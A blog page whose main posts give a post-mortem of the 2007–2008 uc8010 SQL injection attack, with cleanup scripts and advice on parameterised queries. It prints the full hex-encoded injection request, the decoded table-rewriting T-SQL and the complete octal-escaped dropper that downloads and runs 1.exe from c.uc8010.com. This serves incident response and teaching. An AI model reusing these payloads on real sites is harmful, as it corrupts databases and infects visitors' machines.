Microsoft issues advice on SQL injection attacks

Microsoft is alerting customers to several tools that could bolster Web application development in the wake of a rising number of SQL injection attacks targeting faulty code in websites.

This includes the uc8010 attack, which was launched around 28 December 2007 (see the uc8010 post-mortem and original post further down this page for the lowdown).

For the record, the attack is about poor programming (or lazy programming at any rate), and Microsoft are keen to point out that:

Is this a security vulnerability that requires Microsoft to issue a security update?
No. Any Web application code that has followed generally accepted best practices for security is significantly less susceptible to the SQL injection attack. Although this is not a security vulnerability, this advisory was issued to provide additional warning and assistance for administrators with vulnerable sites.

Microsoft Security Advisory (954462) Rise in SQL Injection Attacks Exploiting Unverified User Data Input

For those of you who have recently been hit by an SQL injection attack, here are some useful resources that I have found:

What to do if you do not have a backup of your database from before the SQL injection attack

hackademix.net has code which *may* reverse the SQL injection attack.

This is the crucial piece of code which could save your bacon. It is shown here inside the same cursor loop the attacker used (see the decoded payload in the post-mortem below), so that @T and @C are bound to each user table and each varchar/nvarchar/text/ntext column in turn; hackademix.net has the full script:

DECLARE @T varchar(255), @C varchar(255)
DECLARE Table_Cursor CURSOR FOR select a.name, b.name from sysobjects a, syscolumns b
    where a.id = b.id and a.xtype = 'u' and (b.xtype = 99 or b.xtype = 35 or b.xtype = 231 or b.xtype = 167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T, @C
WHILE (@@FETCH_STATUS = 0)
BEGIN
    EXEC('
        update [' + @T + '] set [' + @C + '] = left(
            convert(varchar(8000), [' + @C + ']),
            len(convert(varchar(8000), [' + @C + '])) - 6 -
            patindex(''%tpircs<%'', reverse(convert(varchar(8000), [' + @C + ']))))
        where [' + @C + '] like ''%<script%</script>''
    ')
    FETCH NEXT FROM Table_Cursor INTO @T, @C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

More than likely you will have to modify it for your specific attack; check hackademix.net for full details. Two caveats before you run it. Take a backup first and test on a restored copy, because convert(varchar(8000), ...) truncates anything longer than 8000 characters and folds nvarchar/ntext data to the database code page. And it cannot give back what the attack destroyed: the injected update used convert(varchar, ...) with no length, which in T-SQL means varchar(30), so any value longer than 30 characters was cut down before the tag was appended. Those rows need restoring from backup.
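As an added example (not hackademix.net's script or this post's code), here is a Python model of both the attacker's update and the cleanup above, so you can check the left/len/patindex arithmetic offline and see what the cleanup cannot give back. Assumptions: CONVERT(varchar, col) with no length behaves as varchar(30), which is the T-SQL default inside CAST/CONVERT; the LIKE pattern is modelled as a substring test; the tag and the sample values are constructed here.

```python
# Model of the uc8010 damage and the hackademix cleanup. Added example, not the original code.
TAG = "<script src=http://c.uc8010.com/0.js></script>"   # what uc8010 appended (host from the decoded payload)


def uc8010_mutation(value: str) -> str:
    """Model of  rtrim(convert(varchar, col)) + '<script ...>'.

    CONVERT with no length is varchar(30) in T-SQL, so every value was cut to
    30 characters (and stripped of trailing spaces) before the tag went on.
    """
    return value[:30].rstrip(" ") + TAG


def hackademix_cleanup(value: str) -> str:
    """Model of the T-SQL above, applied only where col like '%<script%</script>':

        left(s, len(s) - 6 - patindex('%tpircs<%', reverse(s)))
        with s = convert(varchar(8000), col)
    """
    s = value[:8000]                                   # convert(varchar(8000), col)
    if not ("<script" in s and s.endswith("</script>")):
        return value                                   # the WHERE clause skips this row
    p = s[::-1].find("tpircs<") + 1                    # patindex is 1-based (0 = not found)
    # "tpircs<" starts at reversed position p, so the '<' of the last "<script"
    # sits at original position len(s) - p - 5; keep everything before it.
    return s[: len(s) - 6 - p]


if __name__ == "__main__":
    for original in ["Hello world", "A" * 40, "ends with spaces   "]:
        damaged = uc8010_mutation(original)
        print(repr(original), "->", repr(hackademix_cleanup(damaged)))
```

Run it and the second case shows the problem: a 40-character value comes back from the cleanup as exactly 30 characters, because the attack threw the rest away before appending the tag. Rows like that need the backup, not the script.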


Cannot login to last.fm

Am I the only person in the world that cannot login to last.fm?

I know my username and password are okay, because under some circumstances I authenticate ok. Their forums don’t mention it. So is it just me? If you have the same problem, please let me know.

(When I enter my login name and password and hit “come on in”, I get dumped to https://www.last.fm/login)

Phah maybe it will be okay tomorrow. I’m using Firefox 3.0.1. They upgraded the site recently, but I can’t believe they broke the login??

uc8010 sql injection attack: the facts, more info and post mortem

I posted this when my website got hacked. Within hours, thanks to several clever guys, the whole thing was completely deconstructed with hard facts and code. Thanks to all those that contributed their information; it really helped me and many others out there.

This post is a summary of the comments spawned by my original post. If I forgot something important let me know.


How it was done

SQL injection via unescaped query string variables.

We think they looked at and tried several query string variables (like id, by, filter, etc.).

Here is the request they sent (taken from a commenter's log files and slightly tidied; the payload is one long hex literal, wrapped here over several lines):

2007-12-30 18:22:46 POST /crappyoutsourcedCMS.asp;
DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST
(0x4400450043004C0041005200450020004000540020007
600610072006300680061007200280032003500350029002
C00400043002000760061007200630068006100720028003
20035003500290020004400450043004C004100520045002
0005400610062006C0065005F0043007500720073006F007
200200043005500520053004F005200200046004F0052002
000730065006C00650063007400200061002E006E0061006
D0065002C0062002E006E0061006D0065002000660072006
F006D0020007300790073006F0062006A006500630074007
300200061002C0073007900730063006F006C0075006D006
E00730020006200200077006800650072006500200061002
E00690064003D0062002E0069006400200061006E0064002
00061002E00780074007900700065003D002700750027002
00061006E0064002000280062002E0078007400790070006
5003D003900390020006F007200200062002E00780074007
900700065003D003300350020006F007200200062002E007
80074007900700065003D0032003300310020006F0072002
00062002E00780074007900700065003D003100360037002
90020004F00500045004E0020005400610062006C0065005
F0043007500720073006F007200200046004500540043004
80020004E004500580054002000460052004F004D0020002
0005400610062006C0065005F0043007500720073006F007
200200049004E0054004F002000400054002C00400043002
0005700480049004C0045002800400040004600450054004
30048005F005300540041005400550053003D00300029002
00042004500470049004E002000650078006500630028002
70075007000640061007400650020005B0027002B0040005
4002B0027005D00200073006500740020005B0027002B004
00043002B0027005D003D0072007400720069006D0028006
3006F006E007600650072007400280076006100720063006
800610072002C005B0027002B00400043002B0027005D002
90029002B00270027003C007300630072006900700074002
0007300720063003D0068007400740070003A002F002F006
3002E007500630038003000310030002E0063006F006D002
F0030002E006A0073003E003C002F0073006300720069007
00074003E002700270027002900460045005400430048002
0004E004500580054002000460052004F004D00200020005
400610062006C0065005F0043007500720073006F0072002
00049004E0054004F002000400054002C004000430020004
5004E004400200043004C004F00530045002000540061006
2006C0065005F0043007500720073006F007200200044004
50041004C004C004F0043004100540045002000540061006
2006C0065005F0043007500720073006F007200%20AS%20
NVARCHAR(4000));
EXEC(@S);–178|80040e14|Unclosed_quotation_mark_before_the_character_string_’G;
DECLARE_@S_NVARCHAR4000);
SET_@S=CAST0x4400450043004C004100520045002000400
054002000760061007200630068006100720028003200350
0350029002C00400043002000'.
202.101.162.73 HTTP/1.0 Mozilla/3.0+(compatible;+Indy+Library) - 500 15248

Decoded from the hex (it is UTF-16LE, two bytes per character, which is why every second byte is 00), the injected T-SQL is:

DECLARE @T varchar(255),@C varchar(255)
DECLARE Table_Cursor CURSOR FOR
  select a.name, b.name
  from sysobjects a, syscolumns b
  where a.id = b.id
    and a.xtype = 'u'                       -- user tables only
    and (b.xtype = 99 or b.xtype = 35 or    -- ntext, text
         b.xtype = 231 or b.xtype = 167)    -- nvarchar, varchar
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE (@@FETCH_STATUS = 0)
BEGIN
  -- convert(varchar, ...) with no length is varchar(30): every value is cut to 30 characters before the tag is appended
  exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=http://c.uc8010.com/0.js></script>''')
  FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

How to find exactly how it happened to you

Try this at a command prompt on your IIS log files (one file per day, named ex<yymmdd>.log; the hex is the start of the UTF-16LE encoded DECLARE):
find "0x4400450043" ex071228.log
find "0x4400450043" ex071229.log
find "0x4400450043" ex071230.log

How to fix

Make sure nothing from the request is ever spliced into SQL text. Use parameterised queries (SqlCommand with SqlParameter objects, or a stored procedure called with parameters) so that the database receives the id as a value and never as part of the statement. Two things about this particular attack are worth noting before you reach for an escaping routine:

The injected string contains no single quote at all. The T-SQL is carried as a hex literal inside CAST(0x... AS NVARCHAR(4000)) precisely so that it survives quote escaping, and the payload opens with ;DECLARE with nothing to close a string literal, so it was aimed at an unquoted (numeric) parameter, where doubling quotes changes nothing.

Blacklisting 'CAST(' and 'EXEC(' is easy to get round: T-SQL accepts whitespace before the parenthesis, so EXEC (@S) sails past the filter, and sp_executesql will run a string just as well.

The quick patch suggested here at the time, for MS SQL Server from C#, was to escape quotes:

string safer_id = Request.QueryString["id"].Replace("'","''");

and, since CAST( and EXEC( feature in the payload, to cap the length and blacklist those too:

string safer = Request.QueryString["id"].Replace("'","''");
if (safer.Length > 128) safer = safer.Substring(0, 128);
safer = safer.Replace("CAST(", "NOCAST](");
safer = safer.Replace("EXEC(", "NOEXEC](");

These are not foolproof, for the reasons above; treat them as a stop-gap while you move to parameters. For a numeric id, int.TryParse followed by a parameter is the whole fix. Stored procedures only help when they are called with parameters and do not build dynamic SQL with EXEC themselves (I know it is more work!).
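As an added example (not the post's C#), here is the same point in Python against an in-memory SQLite table: the quote-doubling sanitiser ported from the snippet above, a lookup that splices the id into the SQL text, the parameterised version, and a validated version for numeric ids. The table, its rows and the shortened uc8010-style payload are constructed for the example.

```python
import sqlite3
from typing import List

# Shortened payload in the shape of the uc8010 one: it rides on an unquoted
# numeric id and carries its T-SQL as a hex literal, so there is no single
# quote for Replace("'", "''") to double. Constructed for this example.
UC8010_STYLE = ("1;DECLARE @S NVARCHAR(4000);SET @S=CAST(0x4400450043 AS NVARCHAR(4000));"
                "EXEC(@S)")


def quote_doubling(value: str) -> str:
    """The Replace("'", "''") sanitiser from the C# above, ported as-is."""
    return value.replace("'", "''")


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the site's database (constructed rows)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO articles VALUES (1, 'public'), (2, 'private');
    """)
    return conn


def lookup_concatenated(conn: sqlite3.Connection, raw_id: str) -> List[str]:
    """Vulnerable: the id becomes part of the statement text, quotes doubled or not."""
    sql = "SELECT title FROM articles WHERE id = " + quote_doubling(raw_id)
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterised(conn: sqlite3.Connection, raw_id) -> List[str]:
    """Fixed: the id is bound as a parameter, so it can only be compared, never parsed as SQL."""
    rows = conn.execute("SELECT title FROM articles WHERE id = ?", (raw_id,))
    return [row[0] for row in rows]


def lookup_validated(conn: sqlite3.Connection, raw_id: str) -> List[str]:
    """Belt and braces for a numeric id: reject anything that is not an integer, then bind it."""
    return lookup_parameterised(conn, int(raw_id))


if __name__ == "__main__":
    db = make_db()
    print("sanitiser changed the uc8010 payload:", quote_doubling(UC8010_STYLE) != UC8010_STYLE)
    print("concatenated, id=1 OR 1=1 :", lookup_concatenated(db, "1 OR 1=1"))   # every row leaks
    print("parameterised, id=1 OR 1=1:", lookup_parameterised(db, "1 OR 1=1"))  # nothing: compared as a value
```

SQLite's execute() refuses stacked statements, so the ;DECLARE ... EXEC(@S) payload cannot be run end to end here; the `1 OR 1=1` variant shows the same failure class. SQL Server runs stacked statements happily, which is exactly what the log above records.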

What did it do?

Basically the code injected into your database found every varchar, nvarchar, text and ntext column in every user table (the xtype values 167, 231, 35 and 99 in the cursor above), cut each value down to 30 characters (convert(varchar, ...) with no length) and appended the string:

<script src=http://?.uc8010.com/0.js></script>

The code for 0.js looks like this (reindented, comments added; the eval string is the attacker's, unchanged):

function setCookie(name,value)
{
    var Days = 1;
    var exp = new Date();
    exp.setTime(exp.getTime() + Days*30*60*1000);   // 30 minutes, despite the name: the 24-hour line below is commented out
    //Days*24*60*60*1000;
    document.cookie = name + "="+ escape(value) +";expires="+ exp.toGMTString();
}
function getCookie(name)
{
    var arr = document.cookie.match(new RegExp("(^| )"+name+"=([^;]*)(;|$)"));
    if(arr != null)
    {
        return unescape(arr[2]);
    }
    else
    {
        // No "Lin" cookie yet: write two lines (empty as captured here) and set the cookie so this branch runs at most once per 30 minutes
        document.writeln("");
        document.writeln("");
        setCookie("Lin","ok");
        return null;
    }
}
getCookie("Lin");
// Runs whatever getCookie returned: the string below is the real payload, octal-escaped so it survives a casual read of the source
eval("\146\165\156\143\164\151\157\156\40\147\156\50\162\122\141\107\105\171\153\125\61\51\15\12\173\15\12\166\141\162\40\117\162\150\62\75\167\151\156\144\157\167\133\42\115\141\164\150\42\135\133\42\162\141\156\144\157\155\42\135\50\51\52\162\122\141\107\105\171\153\125\61\73\15\12\162\145\164\165\162\156\47\176\164\155\160\47\53\47\56\164\155\160\47\15\12\175\15\12\146\165\156\143\164\151\157\156\40\104\157\167\156\105\50\106\151\154\145\125\122\114\54\114\157\143\141\154\106\151\154\145\51\15\12\173\15\12\164\162\171\15\12\173\15\12\166\151\160\75\106\151\154\145\125\122\114\73\15\12\166\141\162\40\143\150\145\156\172\151\75\167\151\156\144\157\167\133\42\144\157\143\165\155\145\156\164\42\135\133\42\143\162\145\141\164\145\105\154\145\155\145\156\164\42\135\50\42\157\142\152\145\143\164\42\51\73\15\12\143\150\145\156\172\151\133\42\163\145\164\101\164\164\162\151\142\165\164\145\42\135\50\42\143\154\141\163\163\151\144\42\54\42\143\154\163\151\144\72\102\104\71\66\103\65\65\66\55\66\65\101\63\55\61\61\104\60\55\71\70\63\101\55\60\60\103\60\64\106\103\62\71\105\63\66\42\51\73\15\12\166\141\162\40\160\163\75\143\150\145\156\172\151\133\42\103\162\145\141\164\145\117\142\152\145\143\164\42\135\50\42\115\151\143\162\157\163\157\146\164\56\130\115\114\110\124\124\120\42\54\42\42\51\73\15\12\166\141\162\40\154\157\166\145\75\143\150\145\156\172\151\133\42\103\162\145\141\164\145\117\142\152\145\143\164\42\135\50\42\101\144\157\144\142\56\123\164\162\145\141\155\42\54\42\42\51\73\15\12\154\157\166\145\133\42\164\171\160\145\42\135\75\61\73\15\12\160\163\133\42\157\160\145\156\42\135\50\42\107\105\124\42\54\166\151\160\54\60\51\73\15\12\160\163\133\42\163\145\156\144\42\135\50\51\73\15\12\143\150\151\156\141\75\147\156\50\61\60\60\60\60\51\53\114\157\143\141\154\106\151\154\145\73\15\12\166\141\162\40\150\110\146\44\122\66\75\143\150\145\156\172\151\133\42\103\162\145\141\164\145\117\142\152\145\143\164\42\135\50\42\123\143\162\151\160\164\151\156\147\56\106\151\154\145\123\171\163\164\145\155\117\142\152\145\143\164\42\54\42\42\51\73\15\12\166\141\162\40\126\147\104\156\132\130\110\164\67\75\150\110\146\44\122\66\133\42\107\145\164\123\160\145\143\151\141\154\106\157\154\144\145\162\42\135\50\60\51\73\15\12\143\150\151\156\141\75\150\110\146\44\122\66\133\42\102\165\151\154\144\120\141\164\150\42\135\50\126\147\104\156\132\130\110\164\67\54\143\150\151\156\141\51\73\15\12\154\157\166\145\133\42\117\160\145\156\42\135\50\51\73\15\12\154\157\166\145\133\42\127\162\151\164\145\42\135\50\160\163\133\42\162\145\163\160\157\156\163\145\102\157\144\171\42\135\51\73\15\12\154\157\166\145\133\42\123\141\166\145\124\157\106\151\154\145\42\135\50\143\150\151\156\141\54\62\51\73\15\12\154\157\166\145\133\42\103\154\157\163\145\42\135\50\51\73\15\12\166\141\162\40\123\155\101\143\161\111\167\107\126\70\75\143\150\145\156\172\151\133\42\103\162\145\141\164\145\117\142\152\145\143\164\42\135\50\42\123\150\145\154\154\56\101\160\160\154\151\143\141\164\151\157\156\42\54\42\42\51\73\15\12\145\170\160\61\75\150\110\146\44\122\66\133\42\102\165\151\154\144\120\141\164\150\42\135\50\126\147\104\156\132\130\110\164\67\53\47\134\134\163\171\163\164\145\155\63\62\47\54\47\143\155\144\56\145\170\145\47\51\73\15\12\123\155\101\143\161\111\167\107\126\70\133\42\123\150\145\154\154\105\170\145\143\165\164\145\42\135\50\145\170\160\61\54\47\40\57\143\40\47\53\143\150\151\156\141\54\42\42\54\42\157\160\145\156\42\54\60\51\175\143\141\164\143\150\50\151\51\173\151\75\61\175\15\12\175\15\12\104\157\167\156\105\50\42\150\164\164\160\72\57\57\143\56\165\143\70\60\61\60\56\143\157\155\57\162\156\155\142\57\60\57\61\56\145\170\145\42\54\42\61\71\56\145\170\145\42\51\73")
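Added example, not part of the post: a small Python de-obfuscator for the eval() string above. JavaScript \ooo escapes are decoded exactly as the JS parser would decode them, and a few regexes then pull out the indicators a responder wants (URLs, the classid, dropped file names). The sample is three fragments lifted from the real string above (its first statement, the classid it sets and its last statement), joined with the \15\12 (CRLF) the script uses; the IOC regexes are my own.

```python
import re
from typing import Dict, List

# Three fragments from the octal-escaped eval() string above, joined with CRLF.
# Constructed sample for the example, not the whole payload.
SAMPLE = (
    r"\146\165\156\143\164\151\157\156\40\147\156\50\15\12"
    r"\143\154\163\151\144\72\102\104\71\66\103\65\65\66\55\66\65\101\63\55\61\61\104\60\55\71\70\63\101\55\60\60\103\60\64\106\103\62\71\105\63\66\15\12"
    r"\104\157\167\156\105\50\42\150\164\164\160\72\57\57\143\56\165\143\70\60\61\60\56\143\157\155\57\162\156\155\142\57\60\57\61\56\145\170\145\42\54\42\61\71\56\145\170\145\42\51\73"
)

OCTAL = re.compile(r"\\([0-7]{1,3})")   # a backslash followed by one to three octal digits


def decode_octal_js(s: str) -> str:
    """Undo JavaScript \\ooo escapes: this is the string eval() actually receives."""
    return OCTAL.sub(lambda m: chr(int(m.group(1), 8)), s)


def extract_iocs(js: str) -> Dict[str, List[str]]:
    """Pull the indicators a responder wants out of the decoded script (regexes are assumptions)."""
    return {
        "urls": re.findall(r"https?://[^\s\"']+", js),
        "clsids": re.findall(r"clsid:([0-9A-Fa-f-]{36})", js),
        "dropped_files": re.findall(r"\"([^\"/]+\.exe)\"", js),
    }


if __name__ == "__main__":
    decoded = decode_octal_js(SAMPLE)
    print(decoded)
    for kind, values in extract_iocs(decoded).items():
        print(kind, values)
```

Paste the whole eval() string from 0.js into SAMPLE (as a raw string) and the same two functions give you the full dropper source and its indicators; the classid and the 1.exe URL are the two you want in your blocklist and your proxy logs.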

It is malicious: the point

According to websmithrob this code is malicious and hidden in there is an attack known as EXPL_REALPLAY.H, or the RealPlayer exploit (websmithrob's post, linked below, has the details).

Decoding the octal-escaped string that 0.js hands to eval() confirms at least the dropper. The decoded script creates an object element with classid clsid:BD96C556-65A3-11D0-983A-00C04FC29E36 (the MDAC RDS.DataSpace control, the MS06-014 vector), uses its CreateObject to get Microsoft.XMLHTTP, Adodb.Stream, Scripting.FileSystemObject and Shell.Application, fetches http://c.uc8010.com/rnmb/0/1.exe, writes the response body to a file in the Windows folder and launches it with cmd.exe /c. Any visitor whose Internet Explorer would still instantiate that control got a binary run on their machine just by opening a page served from the compromised database.

Related posts: Microsoft issues advice on SQL injection attacks (above) and the original uc8010 post (below).

02 January 2008
original post: a plea for help

I cannot find any information about this anywhere, but it happened to me and at least 76,800 others. Information is thin on the ground. If you know more please post it here.

As far as I can tell, the attack inserts <script src=http://?.uc8010.com/0.js></script> into all varchar and text fields in your SQL database.

For lazy people like me, it is proving to be a nightmare! I have traditionally been very relaxed about this kind of business, I guess I must be more careful from now on.

07 January 2008
update on uc8010(dot)com

The exploit has been exposed and described (see the comments below, which are very informative, or go straight to the post-mortem above). There you can find out HOW they did it and WHAT it did. There is no magic fix: you will most likely have to restore your data from a backup, and to prevent further attacks you must stop splicing query string values into your SQL and bind them as parameters instead.
Thanks very much to the guys who posted their findings here! Much appreciated.

The attack *is* malicious, and the potential payload is described here http://websmithrob.wordpress.com/ (or this http://isc.sans.org/diary.html?date=2008-01-04).

Also watch out for ucmal.com (122.224.146.246), which appears to be up to similar tricks.

When is a trojan not a trojan: asecurityservice.com

A non-technical friend of mine recently phoned me up to say he had been infected by a virus. His home page was hijacked and he was pretty worried. The infection was proudly proclaimed to be by asecurityservice.com. According to several sources [of dubious accuracy] this is very serious.

asecurityservice.com is dangerous toolbar and comes from very dangerous trojan zlob. It hijack your homepage and displays fake warning message to download the another fake spyware applications… If your computer is infected by asecurityservice.com.com hijacker then it is very dangerous for your computer.

from http://www.pcontech.com/

Note how many times they say dangerous. Note how poor the English is. Note how childishly they warn you of the impending doom. Ooooh this must be bad. I want my {mommy | blanket | cigarettes | pillow} (delete as appropriate)

What are the symptoms?

User’s homepage is changed to asecurityservice.com.com or to other unfamiliar websites. Warning messages such as “Virus Alert”, “Your Computer is Infected”, “Security Alert” Trojan-Spy.win32@mx or Spyware.Cyberlog-X infections are displayed.

You even get a warning that something has happened.

The art of deception: dead?

Well that’s all very interesting, but if I were seriously writing a trojan, would I shout so loudly that I had invaded your machine? (I saw Troy, and I don’t remember the Spartans (holding megaphones) riding the wooden horse into Troy, shouting YOUR DEFENSES HAVE BEEN BREACHED. In fact why bother with the wooden horse in the first place?) Morons.

No. More likely this is what I think should be called “asshole-ware”. Why would someone announce that you were ill, could it be so that they could sell you medicine?

Your machine probably is infected, it may even be a real trojan, but the real catch is that they get you to pay $25 to remove the infection. It’s a really dumb idea, but it probably works.

A real trojan is about stealth, it doesn’t announce that it is dangerous.

It’s extremely funny, because they warn you of:

Very High Risk   –  Extremely dangerous Spyware. asecurityservice.com Uses stealth installation, randomly named entries and has the capability to self update or Restore after incomplete removal. Very hard to remove manually. Removing by free software or Re-Name the Dll file of asecurityservice.com cannot decrease the Privacy Risk, because it uses stealth installation method

I like anything which uses stealth and then warns me that it is using stealth. Is the art of deception truly dead? Was the Cold War all for nothing? Fuckwits.

We have a cure

You can use http://www.lavasoftusa.com to clean your machine. It’s free, it’s safe and it’s well known. This is a reputable product, and you can download it from http://www.downloads.com, a safe place to get stuff like this.

If you gonna lie, make it big

The thing to note is that the answer is always the same: a specific recommendation for some no-brand spyware tool. Surprising that they never suggest McAfee or Symantec etc.

Appendix of delusion

This site is probably linked to the idiot mastermind of this scam: http://www.pcontech.com/ where they list their other scams.

Latest Hijackers List (more lies):

  • besecuredtoday.com
  • Asecurityservice.com
  • asafecenter.com
  • awebsecurity.com
  • thesafetynotes.com
  • asecureinfo.com
  • topiesecurity.com
  • asafebrowser.com
  • iesafetylist.com
  • protectstand.com

Old Hijackers List (older lies):

  • assuredguard.com
  • securityiepage.com
  • secureuptodate.com
  • asecurityupdate.com
  • asafehomepage.com
  • aprotectservice.com
  • asafetywarning.com
  • asecurityview.com
  • protectpage.com
  • asafetylist.com
  • asafetyproject.com
  • asafetynotice.com
  • asecuritypaper.com

utorrent 1.7.x banned or broken

I dunno what happened, but it seems to me that uTorrent 1.7.x is broken and is being banned by several trackers. There are several VERY long threads at http://forum.torrent.com/.

Even the Wikipedia article http://en.wikipedia.org/wiki/%CE%9CTorrent has an entry under the headline Major Bugs. For posterity it currently reads (I suspect this will get removed from the article very soon):

Major bugs
On July 21, 2007 µTorrent version 1.7.2 was released which fixed two bugs that had caused earlier 1.7 versions to be banned on a variety of trackers. The bugs in question could cause wrong stats to be reported both intentionally and unintentionally. The first bug was solved in version 1.7.1 and the second in 1.7.2[16]. Although rumors spread that these µTorrent versions also reported personal info to an unknown destination (possibly the RIAA or MPAA) this has not been proven.

The solution is pretty obvious: http://download.utorrent.com/1.6.1/utorrent.exe

There is a bigger issue here, and it concerns the survival of P2P: will our own paranoia about the MPAA / RIAA force P2P out of use? If they are spreading the rumours, it is certainly the best weapon they have against P2P. If it’s just paranoia, well, that’s pretty sad. uTorrent is one of the finest pieces of freeware ever, as essential as WinZip ever was. So let’s not ruin a good thing.

Why nothing you do will ever make a difference

Who was the Time “Person of the Year” in 2006? You’ll never believe it, no, you wouldn’t believe it if I told you, it was you (this is for real, not a “joke”).

How quaint? “You control the Information Age. Welcome to your world.” Who the fuck writes shit like this. Who the fuck believes it. Many do. Writing about holidays in the sun and polka dot bikinis.

No one cares about what you have to say.

You must have realised, after writing over 4,458 posts, and amassing 350 comments and 580,876 views, and 7.5 million page impressions, after building your pathetic “brand online“, you are #1 with a bullet in Technorati, you earn £0.53 a day from Google Adwords. What a success story you are.

You have a Page Rank of 4!

Well done, but guess what. Nothing you do ONLINE will ever make a difference. Turn it off; if you want to be noticed, go have a crap in the middle of the street, that works (you’d be about £0.53 a day worse off though).